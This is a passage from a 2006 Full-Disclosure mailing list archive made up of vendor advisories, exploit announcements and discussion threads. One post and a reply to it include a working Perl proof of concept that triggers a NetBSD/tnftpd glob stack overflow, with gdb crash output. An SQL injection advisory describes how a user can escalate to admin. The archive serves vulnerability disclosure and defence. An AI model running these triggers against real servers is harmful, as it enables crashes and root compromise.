From jammer128 at gmail.com Fri Dec 1 00:19:23 2006 From: jammer128 at gmail.com (Jason Miller) Date: Thu, 30 Nov 2006 18:19:23 -0600 Subject: [Full-disclosure] Nmap Online In-Reply-To: <456BF10D.9080400@matousec.com> References: <456BF10D.9080400@matousec.com> Message-ID: <829b2de40611301619r39d24560w16184c16280ab3b1@mail.gmail.com> im detecting legal actions already. On 11/28/06, David Matousek wrote: > > Hello, > > For all Nmap fans, our group have implemented Nmap Online service. > Its address is http://nmap-online.com/. The interface allows you to > perform custom > Nmap scans from our server with only a few limitations in the syntax. > The service is free and can be used immediately, no registration is > required. > > Please direct your questions and suggestions to our emails. > > > Regards, > > -- > David Matousek > > Founder and Chief Representative of Matousec - Transparent security > http://www.matousec.com/ > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061130/4be1a282/attachment.html From zdi-disclosures at 3com.com Fri Dec 1 00:27:41 2006 From: zdi-disclosures at 3com.com (zdi-disclosures at 3com.com) Date: Thu, 30 Nov 2006 16:27:41 -0800 Subject: [Full-disclosure] ZDI-06-043: Novell Netware Client Print Provider Buffer Overflow Vulnerability In-Reply-To: Message-ID: Thanks for pointing this out JP, it does in fact look confusing. We determined during the Digital Vaccine filter creation process that a previously released filter was robust enough to block the attack without further modification and the vendor was immeditately notified. ZDI Team "Dude VanWinkle" 11/30/2006 05:02 AM To zdi-disclosures/F/US/3Com at 3Com cc full-disclosure at lists.grok.org.uk, bugtraq at securityfocus.com Subject Re: [Full-disclosure] ZDI-06-043: Novell Netware Client Print Provider Buffer Overflow Vulnerability On 11/29/06, zdi-disclosures at 3com.com wrote: > ZDI-06-043: Novell Netware Client Print Provider Buffer Overflow > Vulnerability > http://www.zerodayinitiative.com/advisories/ZDI-06-043.html > November 29, 2006 > -- Disclosure Timeline: > 2005.07.07 - Digital Vaccine released to TippingPoint customers > 2006.10.02 - Vulnerability reported to vendor > 2006.11.29 - Coordinated public release of advisory you waited over a year to report it to the vendor? sounds like analyzing your digital vaccine rules might yield a slew of reproducible 0 days that vendors are unaware of..... -JP From kingcope at gmx.net Fri Dec 1 00:25:14 2006 From: kingcope at gmx.net (kcope) Date: Fri, 01 Dec 2006 01:25:14 +0100 Subject: [Full-disclosure] NetBSD FTPD and ports ***REMOTE ROOOOOT HOLE*** Message-ID: <20061201002514.196150@gmx.net> LAMERZ!!!!! KEEP ON HACKING!!! KEEP THAT *FUCK*ING PRIVATE!!! Greetings to the elite guys, thank you for your time. signed, ***eliteboy*** $$$ NetBSD ftpd and ports *Remote ROOOOOT $HOLE$* $$$ About tnftpd is a port of the NetBSD FTP server to other systems. It offers many enhancements over the traditional BSD ftpd, including per-class configuration directives via ftpd.conf(5), RFC 2389 and draft-ietf-ftpext-mlst-11 support, IPv6, transfer rate throttling, and more. tnftpd was formerly known as lukemftpd, and earlier versions are present in Mac OS X 10.2 (as ftpd) and FreeBSD 5.0 (as lukemftpd). Description The NetBSD ftpd and the tnftpd port suffer from a remote stack overrun, which can lead to a root compromise. The bug is in glob.c file. The globbing mechanism is flawed as back in 2001. To trigger the overflow you can create a folder and use the globbing special characters (like STARS) to overflow an internal stack based buffer. Example PoC: ---snip--- use IO::Socket; $sock = IO::Socket::INET->new(PeerAddr => '192.168.2.10', PeerPort => '21', Proto => 'tcp'); $c = "C"; $a = "C" x 255; $d = "A" x 450; print $sock "USER kcope\r\n"; print $sock "PASS remoteroot\r\n"; $x = ; print $sock "MKD $a\r\n"; print $sock "NLST C*/../C*/../C*/../$d\r\n"; print $sock "QUIT\r\n"; while (<$sock>) { print; } ---snip--- gdb output tested on NetBSD 3.0 i386 NetBSD-ftpd 20050303 : (gdb) c Continuing. Program received signal SIGSEGV, Segmentation fault. 0x00410041 in ?? () (gdb) tnftpd-20040810 behaves similar. FreeBSD (lukemftpd) and MacOSX (ftpd) were not tested, however they could have the same bug, because of the same codebase. The problem when exploiting this kind of bug is, that we can only control 0x00410041, not the whole 32 bit. However it looks feasible to find a way to do a hole EIP redirection and/or exploit the bug the "unicode" way, which could be especially hard on BSD systems. -- Der GMX SmartSurfer hilft bis zu 70% Ihrer Onlinekosten zu sparen! Ideal f?r Modem und ISDN: http://www.gmx.net/de/go/smartsurfer From kf_lists at digitalmunition.com Fri Dec 1 01:17:23 2006 From: kf_lists at digitalmunition.com (K F (lists)) Date: Thu, 30 Nov 2006 20:17:23 -0500 Subject: [Full-disclosure] NetBSD FTPD and ports ***REMOTE ROOOOOT HOLE*** In-Reply-To: <20061201002514.196150@gmx.net> References: <20061201002514.196150@gmx.net> Message-ID: <456F82A3.40001@digitalmunition.com> I can confirm that this bug is present on OSX 10.3.9 at the very least. lukemftpd-20040810 is the version this was tested against. I am fairly sure that this issue was patched recently in: Security Update 2006-003 * *FTPServer* CVE-ID: CVE-2006-1445 Available for: Mac OS X v10.3.9, Mac OS X Server v10.3.9, Mac OS X v10.4.6, Mac OS X Server v10.4.6 Impact: FTP operations by authenticated FTP users may lead to arbitrary code execution Description: Multiple issues in FTP server path name handling could result in a buffer overflow. A malicious authenticated user may be able to trigger this overflow which may lead to arbitrary code execution with the privileges of the FTP server. This update adresses the issue by properly handling the boundary conditions. ftp> o localhost Trying ::1... Connected to localhost. 220 localhost FTP server (tnftpd 20040810) ready. Name (localhost:kevinf): 331 Password required for kevinf. Password: 230- Welcome to Darwin! 230 User kevinf logged in. Remote system type is UNIX. Using binary mode to transfer files. ftp> mkdir CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC 550 CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC: File exists. ftp> ls C*/../C*/../C*/../AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 229 Entering Extended Passive Mode (|||49225|) 421 Service not available, remote server timed out. Connection closed ftp> kevin-fs-Computer:/cores kevinf$ sudo gdb -q /usr/libexec/ftpd 425 Password: Reading symbols for shared libraries ... done /cores/425: No such file or directory. Attaching to program: `/usr/libexec/ftpd', process 425. Reading symbols for shared libraries ........... done 0x9000ed44 in read () (gdb) c Continuing. Program received signal EXC_BAD_ACCESS, Could not access memory. 0x00410040 in ?? () (gdb) bt #0 0x00410040 in ?? () Cannot access memory at address 0x410040 Cannot access memory at address 0x410041 #1 0x00000000 in ?? () (gdb) kevin-fs-Computer:/Volumes/HARD DISK kevinf$ ps -aux -ocommand,svuid,svgid,ruid,rgid,uid,gid | grep ftpd kevinf 425 0.0 0.3 28072 820 ?? SXs 8:02PM 0:00.05 0 0 0 0 501 501 ftpd -l This could be fun on x86 machines.... good luck on powerpc howerver. Thanks for the excuse to finish my OSX Unicode research! -KF kcope wrote: > LAMERZ!!!!! > KEEP ON HACKING!!! KEEP THAT *FUCK*ING PRIVATE!!! > > Greetings to the elite guys, thank you for your time. > > signed, > ***eliteboy*** > > $$$ NetBSD ftpd and ports *Remote ROOOOOT $HOLE$* $$$ > > About > > tnftpd is a port of the NetBSD FTP server to other systems. > It offers many enhancements over the traditional BSD ftpd, > including per-class configuration directives via ftpd.conf(5), > RFC 2389 and draft-ietf-ftpext-mlst-11 support, IPv6, > transfer rate throttling, and more. > tnftpd was formerly known as lukemftpd, > and earlier versions are present in Mac OS X 10.2 (as ftpd) > and FreeBSD 5.0 (as lukemftpd). > > Description > > The NetBSD ftpd and the tnftpd port suffer from a remote stack overrun, > which can lead to a root compromise. > > The bug is in glob.c file. The globbing mechanism is flawed as back in > 2001. > > To trigger the overflow you can create a folder and use the globbing > special characters (like STARS) to overflow an internal stack based buffer. > Example PoC: > ---snip--- > use IO::Socket; > > $sock = IO::Socket::INET->new(PeerAddr => '192.168.2.10', > PeerPort => '21', > Proto => 'tcp'); > $c = "C"; > $a = "C" x 255; > $d = "A" x 450; > > print $sock "USER kcope\r\n"; > print $sock "PASS remoteroot\r\n"; > $x = ; > print $sock "MKD $a\r\n"; > print $sock "NLST C*/../C*/../C*/../$d\r\n"; > print $sock "QUIT\r\n"; > > while (<$sock>) { > print; > } > ---snip--- > > gdb output tested on NetBSD 3.0 i386 NetBSD-ftpd 20050303 : > (gdb) c > Continuing. > > Program received signal SIGSEGV, Segmentation fault. > 0x00410041 in ?? () > (gdb) > > > > > tnftpd-20040810 behaves similar. > FreeBSD (lukemftpd) and MacOSX (ftpd) were not tested, > however they could have the same bug, because of the same > codebase. > > The problem when exploiting this kind of bug is, > that we can only control 0x00410041, not the whole > 32 bit. However it looks feasible to find a way > to do a hole EIP redirection and/or exploit > the bug the "unicode" way, which could be especially > hard on BSD systems. > > From dudevanwinkle at gmail.com Fri Dec 1 01:52:25 2006 From: dudevanwinkle at gmail.com (Dude VanWinkle) Date: Thu, 30 Nov 2006 20:52:25 -0500 Subject: [Full-disclosure] ZDI-06-043: Novell Netware Client Print Provider Buffer Overflow Vulnerability In-Reply-To: References: Message-ID: On 11/30/06, zdi-disclosures at 3com.com wrote: > Thanks for pointing this out JP, it does in fact look confusing. We > determined during the Digital Vaccine filter creation process that a > previously released filter was robust enough to block the attack without > further modification and the vendor was immeditately notified. NP, I would clarify that in future notifications. i.e.: "tippingpoint customers have been protected from attacks of this kind since xyz date by GenericFilterX". Then you could list the time lines for discovered/acquired, vendor notification, patch released from vendor, and finally; public disclosure. -JP From security at mandriva.com Fri Dec 1 02:18:01 2006 From: security at mandriva.com (security at mandriva.com) Date: Thu, 30 Nov 2006 19:18:01 -0700 Subject: [Full-disclosure] [ MDKSA-2006:220 ] - Updated libgsf packages fix heap buffer overflow vulnerability Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDKSA-2006:220 http://www.mandriva.com/security/ _______________________________________________________________________ Package : libgsf Date : November 30, 2006 Affected: 2007.0, Corporate 3.0 _______________________________________________________________________ Problem Description: "infamous41md" discovered a heap buffer overflow vulnerability in libgsf, a GNOME library for reading and writing structured file formats, which could lead to the execution of arbitrary code. The updated packages have been patched to correct this problem. _______________________________________________________________________ References: http://www.debian.org/security/2006/dsa-1221 _______________________________________________________________________ Updated Packages: Mandriva Linux 2007.0: e2a8d38173f4d4eaf630779b212b9ecf 2007.0/i586/libgsf-1_114-1.14.1-2.1mdv2007.0.i586.rpm 0874198afe21dd57b297614d0451416c 2007.0/i586/libgsf-1_114-devel-1.14.1-2.1mdv2007.0.i586.rpm 5d46cfd87b088be65ac564b4208d3780 2007.0/i586/libgsf-1.14.1-2.1mdv2007.0.i586.rpm 029b6965cd0d3c6ea198e9ac601fb972 2007.0/SRPMS/libgsf-1.14.1-2.1mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: 003d7db8087dc2e8b1773011e6d4847a 2007.0/x86_64/lib64gsf-1_114-1.14.1-2.1mdv2007.0.x86_64.rpm 583a7f1fdd9b0c92b2ff6d64b18b08b4 2007.0/x86_64/lib64gsf-1_114-devel-1.14.1-2.1mdv2007.0.x86_64.rpm 1e676f26116db9f4a392d2719db228d5 2007.0/x86_64/libgsf-1.14.1-2.1mdv2007.0.x86_64.rpm 029b6965cd0d3c6ea198e9ac601fb972 2007.0/SRPMS/libgsf-1.14.1-2.1mdv2007.0.src.rpm Corporate 3.0: c059f972836144253da330f8db5387a3 corporate/3.0/i586/libgsf-1_1-1.8.2-1.1.C30mdk.i586.rpm 9f9fd3e74c9ec2ee6a79937d4740321c corporate/3.0/i586/libgsf-1_1-devel-1.8.2-1.1.C30mdk.i586.rpm 36f8c30001d414877e819c439143a696 corporate/3.0/SRPMS/libgsf-1.8.2-1.1.C30mdk.src.rpm Corporate 3.0/X86_64: 1a2bef3524a009d553419b159d80f781 corporate/3.0/x86_64/lib64gsf-1_1-1.8.2-1.1.C30mdk.x86_64.rpm f2e48664350fd62e2b12dc77abe11a46 corporate/3.0/x86_64/lib64gsf-1_1-devel-1.8.2-1.1.C30mdk.x86_64.rpm 36f8c30001d414877e819c439143a696 corporate/3.0/SRPMS/libgsf-1.8.2-1.1.C30mdk.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2.2 (GNU/Linux) iD8DBQFFb2VImqjQ0CJFipgRAkAZAKC/C/ST0+jm03acd2z99w3DHkeT2wCfcTw3 bxchI1qLhQdHz6tA/yajqL8= =Snqc -----END PGP SIGNATURE----- From security at mandriva.com Fri Dec 1 03:29:01 2006 From: security at mandriva.com (security at mandriva.com) Date: Thu, 30 Nov 2006 20:29:01 -0700 Subject: [Full-disclosure] [ MDKSA-2006:221 ] - Updated gnupg packages fix vulnerability Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDKSA-2006:221 http://www.mandriva.com/security/ _______________________________________________________________________ Package : gnupg Date : November 30, 2006 Affected: 2006.0, 2007.0, Corporate 3.0, Corporate 4.0, Multi Network Firewall 2.0 _______________________________________________________________________ Problem Description: Buffer overflow in the ask_outfile_name function in openfile.c for GnuPG (gpg) 1.4 and 2.0, when running interactively, might allow attackers to execute arbitrary code via messages that cause the make_printable_string function to return a longer string than expected while constructing a prompt. Updated packages have been patched to correct this issue. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6169 _______________________________________________________________________ Updated Packages: Mandriva Linux 2006.0: c3ce4cd92136d7f632c14a6c80938b82 2006.0/i586/gnupg-1.4.2.2-0.4.20060mdk.i586.rpm bfaeaba79a74d3873b598f90e0e801e0 2006.0/i586/gnupg2-1.9.16-4.3.20060mdk.i586.rpm 9ac3ae5eb7475c230c7a7d0937c1c381 2006.0/SRPMS/gnupg-1.4.2.2-0.4.20060mdk.src.rpm c5da4a8a6e5bd9ec333d73180d93d64f 2006.0/SRPMS/gnupg2-1.9.16-4.3.20060mdk.src.rpm Mandriva Linux 2006.0/X86_64: 8fcc5fdb170d0b268c13f93aabe0502e 2006.0/x86_64/gnupg-1.4.2.2-0.4.20060mdk.x86_64.rpm b7ef342175e3eaac7fc3794159f2064e 2006.0/x86_64/gnupg2-1.9.16-4.3.20060mdk.x86_64.rpm 9ac3ae5eb7475c230c7a7d0937c1c381 2006.0/SRPMS/gnupg-1.4.2.2-0.4.20060mdk.src.rpm c5da4a8a6e5bd9ec333d73180d93d64f 2006.0/SRPMS/gnupg2-1.9.16-4.3.20060mdk.src.rpm Mandriva Linux 2007.0: d7ddd9237786b5e2d3b0fed45f1a1071 2007.0/i586/gnupg-1.4.5-1.1mdv2007.0.i586.rpm cc2078cc49dc6fb5f11add689684e60a 2007.0/i586/gnupg2-1.9.22-2.1mdv2007.0.i586.rpm a492a12d44d0491f676566959847c4e6 2007.0/SRPMS/gnupg-1.4.5-1.1mdv2007.0.src.rpm f1816783fde74d0233d44ae64301886c 2007.0/SRPMS/gnupg2-1.9.22-2.1mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: 9ba224c45d13760e8100d88159818da0 2007.0/x86_64/gnupg-1.4.5-1.1mdv2007.0.x86_64.rpm 13a6b47c7f88ffc1614e42a1276b7ac4 2007.0/x86_64/gnupg2-1.9.22-2.1mdv2007.0.x86_64.rpm a492a12d44d0491f676566959847c4e6 2007.0/SRPMS/gnupg-1.4.5-1.1mdv2007.0.src.rpm f1816783fde74d0233d44ae64301886c 2007.0/SRPMS/gnupg2-1.9.22-2.1mdv2007.0.src.rpm Corporate 3.0: 92abcd2621d7f9ae84625abda55ac4d0 corporate/3.0/i586/gnupg-1.4.2.2-0.4.C30mdk.i586.rpm ec6725061073900f143df92a6f398f20 corporate/3.0/SRPMS/gnupg-1.4.2.2-0.4.C30mdk.src.rpm Corporate 3.0/X86_64: b6d1b7f3f609295724f3fe2372ba6103 corporate/3.0/x86_64/gnupg-1.4.2.2-0.4.C30mdk.x86_64.rpm ec6725061073900f143df92a6f398f20 corporate/3.0/SRPMS/gnupg-1.4.2.2-0.4.C30mdk.src.rpm Corporate 4.0: 7149e243684d303bd5b2bbda7ee9ffb9 corporate/4.0/i586/gnupg-1.4.2.2-0.4.20060mlcs4.i586.rpm c918da1cadd3c86aca8a6317cd36fc28 corporate/4.0/i586/gnupg2-1.9.16-4.3.20060mlcs4.i586.rpm b94a486c4644fd56ed61602b0ab7fac7 corporate/4.0/SRPMS/gnupg-1.4.2.2-0.4.20060mlcs4.src.rpm eb8b52a35c09081cc9f3f8e70ae67e5f corporate/4.0/SRPMS/gnupg2-1.9.16-4.3.20060mlcs4.src.rpm Corporate 4.0/X86_64: ad3b69e395186d56ec93a2ac21330bc3 corporate/4.0/x86_64/gnupg-1.4.2.2-0.4.20060mlcs4.x86_64.rpm 8c7327c6d4244a7a8ead9d1f5f4f462e corporate/4.0/x86_64/gnupg2-1.9.16-4.3.20060mlcs4.x86_64.rpm b94a486c4644fd56ed61602b0ab7fac7 corporate/4.0/SRPMS/gnupg-1.4.2.2-0.4.20060mlcs4.src.rpm eb8b52a35c09081cc9f3f8e70ae67e5f corporate/4.0/SRPMS/gnupg2-1.9.16-4.3.20060mlcs4.src.rpm Multi Network Firewall 2.0: 08d7f0201cff5462b8ad7ea010e241b2 mnf/2.0/i586/gnupg-1.4.2.2-0.5.M20mdk.i586.rpm 2c9b6c752e00c97793e7e436c89d2c5a mnf/2.0/SRPMS/gnupg-1.4.2.2-0.5.M20mdk.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2.2 (GNU/Linux) iD8DBQFFb3PbmqjQ0CJFipgRAr2rAJ9RIKCR3c9Ub/bUZOiV2TOkLqC31ACeLyjd ViNXuwBd2xrr6sqSzGL+2DU= =H7Y/ -----END PGP SIGNATURE----- From tonnerre.lombard at sygroup.ch Fri Dec 1 07:47:13 2006 From: tonnerre.lombard at sygroup.ch (Tonnerre Lombard) Date: Fri, 01 Dec 2006 08:47:13 +0100 Subject: [Full-disclosure] SSH brute force blocking tool In-Reply-To: <456C6AFF.3060004@infiltrated.net> References: <456B3AE2.9070708@infiltrated.net> <20061127203433.GC6620@sdf.lonestar.org> <1638869788.20061128152124@Zoller.lu> <456C489F.4020105@infiltrated.net> <20061128154219.GA31705@sdf.lonestar.org> <456C5C31.4000002@infiltrated.net> <20061128160236.GB31705@sdf.lonestar.org> <20061128161621.GC31705@sdf.lonestar.org> <456C6AFF.3060004@infiltrated.net> Message-ID: <1164959233.39297.35.camel@aspirateur.sygroup-int.ch> Salut, On Tue, 2006-11-28 at 11:59 -0500, J. Oquendo wrote: > Nov 27 16:31:21 local sshd[67010]: Illegal user dd from 213.134.128.227 > awk '($5=="Illegal"||$6=="Illegal")&&$9=="from"{print $10}' What if I set my user name to "bikermice from mars"? Are you going to blacklist mars then? Tonnerre -- SyGroup GmbH Tonnerre Lombard Solutions Systematiques Tel:+41 61 333 80 33 Roeschenzerstrasse 9 Fax:+41 61 383 14 67 4153 Reinach BL Web:www.sygroup.ch tonnerre.lombard at sygroup.ch -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 825 bytes Desc: This is a digitally signed message part Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061201/8c8b5788/attachment.bin From dante at alighieri.org Fri Dec 1 08:47:00 2006 From: dante at alighieri.org (Davide Del Vecchio) Date: Fri, 01 Dec 2006 09:47:00 +0100 Subject: [Full-disclosure] =?iso-8859-1?q?3Com_TFTP_Service_=3C=3D_2=2E0?= =?iso-8859-1?q?=2E1_=28Long_Transporting_Mode=29__Overflow_Exploit?= Message-ID: <20061201084700.1146.qmail@webmaild.fe1.aruba.it> Hello list, this is a poc exploit for 3Com TFTP Service <= 2.0.1 (Long Transporting Mode) Overflow Exploit written by Cthulhu http://www.crazybinary.org/exploits/3comftp_xpsp2.rb Enjoy it, Davide Del Vecchio & Michele Tumolo (Cthulhu). - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Davide Del Vecchio "Dante Alighieri" dante at alighieri.org http://www.alighieri.org http://legaest.blogspot.com - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - From michael.huber at gmail.com Fri Dec 1 08:13:38 2006 From: michael.huber at gmail.com (Mike Huber) Date: Fri, 1 Dec 2006 03:13:38 -0500 Subject: [Full-disclosure] Nmap Online In-Reply-To: <829b2de40611301619r39d24560w16184c16280ab3b1@mail.gmail.com> References: <456BF10D.9080400@matousec.com> <829b2de40611301619r39d24560w16184c16280ab3b1@mail.gmail.com> Message-ID: first of all, IANAL, but the TOS seem to cover the basics... However, I am unsure whether they would hold up under strict legal scrutiny. As far as I can tell, they may hold up under US criminal law, but not under civil law, as tort law has its own wonderful little eccentricities. The best safeguard they seem to have is that they must log the source IP of all scan requests... As far as I know, anyone who takes the time to read the nmap man page should be able to craft a scan which won't be detected by the scanned host (can someone be a definitive source on this point?), and anyone taking malicious action ought to be taking sufficient precautions to avoid detection anyway. None-the-less, my 8-ball sees litigation in their future. On 11/30/06, Jason Miller wrote: > > im detecting legal actions already. > > On 11/28/06, David Matousek wrote: > > > > Hello, > > > > For all Nmap fans, our group have implemented Nmap Online service. > > Its address is http://nmap-online.com/. The interface allows you to > > perform custom > > Nmap scans from our server with only a few limitations in the syntax. > > The service is free and can be used immediately, no registration is > > required. > > > > Please direct your questions and suggestions to our emails. > > > > > > Regards, > > > > -- > > David Matousek > > > > Founder and Chief Representative of Matousec - Transparent security > > http://www.matousec.com/ > > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061201/27f4c92f/attachment.html From announce-noreply at rpath.com Fri Dec 1 03:40:00 2006 From: announce-noreply at rpath.com (rPath Update Announcements) Date: Thu, 30 Nov 2006 22:40:00 -0500 Subject: [Full-disclosure] rPSA-2006-0220-1 dovecot Message-ID: <456fa410.x1FK2H34l0MlWBaT%announce-noreply@rpath.com> rPath Security Advisory: 2006-0220-1 Published: 2006-11-30 Products: rPath Linux 1 Rating: Minor Exposure Level Classification: Local Deterministic Denial of Service Updated Versions: dovecot=/conary.rpath.com at rpl:devel//1/1.0.beta8-4.2-1 References: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5973 https://issues.rpath.com/browse/RPL-802 Description: Previous versions of the dovecot package are vulnerable to a denial of service attack only in a non-default configuration, and only by authenticated users in that configuration. From announce-noreply at rpath.com Fri Dec 1 03:43:57 2006 From: announce-noreply at rpath.com (rPath Update Announcements) Date: Thu, 30 Nov 2006 22:43:57 -0500 Subject: [Full-disclosure] rPSA-2006-0221-1 openldap openldap-clients openldap-servers Message-ID: <456fa4fd.mjZLbPK7jnGjCHNF%announce-noreply@rpath.com> rPath Security Advisory: 2006-0221-1 Published: 2006-11-30 Products: rPath Linux 1 Rating: Major Exposure Level Classification: Remote Deterministic Denial of Service Updated Versions: openldap=/conary.rpath.com at rpl:devel//1/2.2.26-8.5-1 openldap-clients=/conary.rpath.com at rpl:devel//1/2.2.26-8.5-1 openldap-servers=/conary.rpath.com at rpl:devel//1/2.2.26-8.5-1 References: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5779 https://issues.rpath.com/browse/RPL-820 Description: Previous versions of the openldap package are vulnerable to a remote denial of service attack that causes the openldap daemon to crash. This vulnerability is understood not to enable any form of remote execution. From announce-noreply at rpath.com Fri Dec 1 03:46:14 2006 From: announce-noreply at rpath.com (rPath Update Announcements) Date: Thu, 30 Nov 2006 22:46:14 -0500 Subject: [Full-disclosure] rPSA-2006-0222-1 tar Message-ID: <456fa586.6BVDPdoZiyllr7wx%announce-noreply@rpath.com> rPath Security Advisory: 2006-0222-1 Published: 2006-11-30 Products: rPath Linux 1 Rating: Severe Exposure Level Classification: Indirect User Deterministic Vulnerability Updated Versions: tar=/conary.rpath.com at rpl:devel//1/1.15.1-7.1-1 References: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6097 https://issues.rpath.com/browse/RPL-821 Description: Previous version of the tar package are vulnerable to an attack in which unpacking an intentionally-malformed tar archive can overwrite arbitrary files to which the user running tar has write access. If the attacking user knows the name of a vulnerable binary file and overwrites it, this allows the attacker to place arbitrary code on the system which is likely to be run. If root is running tar, this includes any file on the system, which would elevate this to an indirect non-deterministic remote root unauthorized access vulnerability. From announce-noreply at rpath.com Fri Dec 1 03:48:29 2006 From: announce-noreply at rpath.com (rPath Update Announcements) Date: Thu, 30 Nov 2006 22:48:29 -0500 Subject: [Full-disclosure] rPSA-2006-0224-1 gnupg Message-ID: <456fa60d.GYk4A3QvAzgXP9D7%announce-noreply@rpath.com> rPath Security Advisory: 2006-0224-1 Published: 2006-11-30 Products: rPath Linux 1 Rating: Minor Exposure Level Classification: Indirect Non-deterministic Unauthorized Access Updated Versions: gnupg=/conary.rpath.com at rpl:devel//1/1.4.5-1.1-1 References: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6169 https://issues.rpath.com/browse/RPL-826 Description: Previous versions of the gnupg package contain a weakness that may enable an attacker to create a malformed message that causes gnupg to crash or execute arbitrary code provided by the attacker. This weakness exists only in interactive mode; other applications which call gpg in batch mode are not susceptible. From scy-adv at scytale.de Fri Dec 1 09:00:32 2006 From: scy-adv at scytale.de (Tim Weber) Date: Fri, 1 Dec 2006 10:00:32 +0100 Subject: [Full-disclosure] deV!L`z Clanportal - SQL Injection [061124a] Message-ID: <200612011000.33083.scy-adv@scytale.de> / -[061124a]- \ | deV!L`z Clanportal - SQL Injection | \ / S Y N O P S I S / =================' -( access: remote severity: high )- An SQL injection has been found in deV!L`z Clanportal, which allows any logged in user to grant herself admin privileges in the system. B A C K G R O U N D / =====================' deV!L`z Clanportal (short "DZCP") is a suite of PHP scripts that allow anybody to create a feature-rich website for her online gaming clan. A F F E C T E D V E R S I O N S / ===================================' verified on: 1.3.6 possibly vulnerable: <= 1.3.6 fixed in: 1.3.6.1 I M P A C T / =============' The attacker gains admin privileges in DZCP and is thus able to create and download a MySQL dump, upload files, post news, delete users etc. P R E R E Q U I S I T I E S / =============================' o the attacker needs to have an user account in the suite and be logged in o php.ini directive "magic_quotes_gpc" has to be disabled D E S C R I P T I O N / =======================' sites/index.php is not escaping the $_GET['show'] parameter, leading to an SQL injection. This can be used to pass any string to the $where parameter in DZCP's page() function. page(), in turn, is not checking that parameter, allowing a second SQL injection in an UPDATE statement on the "users" table to change arbitrary attributes in the calling user's tuple, including the "level" attribute, which, set to 4, grants the user administrator privileges. W O R K A R O U N D / =====================' Some possibilities: o Add a mysql_real_escape_string() around the $_GET parameter in the SQL query in sites/index.php. o Remove sites/index.php or make it inaccessible. o Quit using DZCP. I mean it! There are tons of other vulnerabilites just waiting to be exploited; some of them more severe than this one. IMHO, DZCP is just a chaotic bunch of vulnerabilities that, by some coincidence, happen to look like a clan portal. P R O O F O F C O N C 